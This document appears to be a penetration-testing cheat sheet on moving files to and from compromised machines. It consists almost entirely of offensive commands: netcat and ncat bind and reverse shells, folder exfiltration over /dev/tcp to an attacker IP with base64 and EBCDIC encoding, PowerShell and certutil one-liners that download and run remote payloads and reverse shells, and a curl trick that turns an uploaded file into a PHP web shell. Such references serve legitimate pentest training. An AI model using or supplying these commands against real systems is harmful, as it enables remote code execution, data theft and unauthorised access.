File transfer
Last updated
Was this helpful?
Last updated
Was this helpful?
Netcat [nc]
nc -w 3 <target_ip> 1234 < LinEnum.sh on target machine: nc -l -p 1234 > LinEnum.sh
nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)
Bob sets listener with shell:
nc -lnvp 4444 -e cmd.exe -> Alice connects: nc -nv 10.0.0.22 4444
or Bob listens:
nc -nlvp 4444 -> Alice sends her shell to Bob's listener: nc -nv 10.0.0.22 4444 -e /bin/bash
Ncat - Bind shell [listener shares shell] ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl ncat -v 10.0.0.22 4444 --ssl
Ncat - Reverse shell [connector shares shell] ncat --exec cmd.exe -vn 192.168.100.145 4444 --ssl ncat -vnl 4444 --ssl --allow 192.168.100.146
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh wget http://IP_ADDR/file -O /path/to/where/you/want/file/to/go curl http://attackerip/file > file fetch http://IP_ADDR/file ftp -s:input.txt tftp -i get file /path/on/victim
Upload a file curl --upload-file [-T] ./tecmint.txt https://transfer.sh/tecmint.txt And rename it to an executable file using the MOVE method with the curl command: curl -X MOVE --header Destination:http://$ip/leetshellz.php http://$ip/leetshellz.txt
Nc
nc -vl 44444 > pick_desired_name_for_received_file nc -N 10.11.12.10 44444 < /path/to/file/you/want/to/send
On own attacker machine nc -nlvp 80 > datafolder.tmp
On target machine tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<attacker_IP>/80
On own machine dd conv=ascii if=datafolder.tmp |base64 -d > datafolder.tar tar xf datafolder.tar
SSH to own machine tar zcf - /tmp/datafolder | ssh root@<attacker_IP > "cd /tmp; tar zxpf -" tar the contents of our /tmp/datafolder while sending the output to (-) and then SSH it over to our attacker system
bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+) bitsadmin /transfer download /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
Python ftp\ - python -m pyftpdlib -w -p 21
The best way i've found for file transfer on MOST machines is to just use plain old ftp. just about every windows machine has it installed by default, and you can get a really good quick and easy python script.
"pip install pyftpdlib or pip3 install pyftpdlib" once pyftpdlib is installed, just run it in the directory you want to download files to with "python -m pyftpdlib -w -p 21" then on your client machine type ftp -A your.ip.add.ress (the -A is for Anonymous, these shells will hang on user/password entry sometimes, don't use this option with linux machines though) and you're ready to transfer files!
python -m pyftpdlib -w -p 21 or python3 -m pyftpdlib -w
ftp -s:input.txt
tftp -i 10.11.0.126 get nc.exe
python3 -m http.server
python -m SimpleHTTPServer
C:\> powershell.exe -exec bypass -Command “& {iex((New-Object System.Net.WebClient).DownloadFile(‘http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}”
PS C:\> iex (New-Object Net.Webclient).DownloadString(“http://attacker_url/script.ps1")
C:\> powershell iex (New-Object Net.Webclient).DownloadString(‘http://attacker_url/script.ps1’)
powershell -exec bypass -c (New-Object Net.WebClient).DownloadString(\"http://10.11.0.84/rev.ps1\") | IEX; Invoke-Powershell
iex (New-Object Net.Webclient).DownloadString("http://attacker_url/Invoke-PowerShellTcp.ps1"); Invoke-PowerShellTcp -Reverse -IPAdress <listener IP> -Port 4444
SMB Server python /usr/share/doc/python-impacket/examples/smbserver.py files /root/Documents/oscp/files/windows-binaries
To put/get files:
copy \\10.11.0.126\files\nc.exe
copy C:\bank-account.zip \\10.11.0.126\files\
Execute a file from SMB server \\10.9.122.8\ROPNOP\met8888.exe
There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example; cmd.exe /c "certutil[.exe] -urlcache -split -f http://$IP/Powerless.bat [Powerless.bat]" certutil.exe -urlcache -split -f "http://10.11.0.126/win32revtcp.exe" [shell.exe]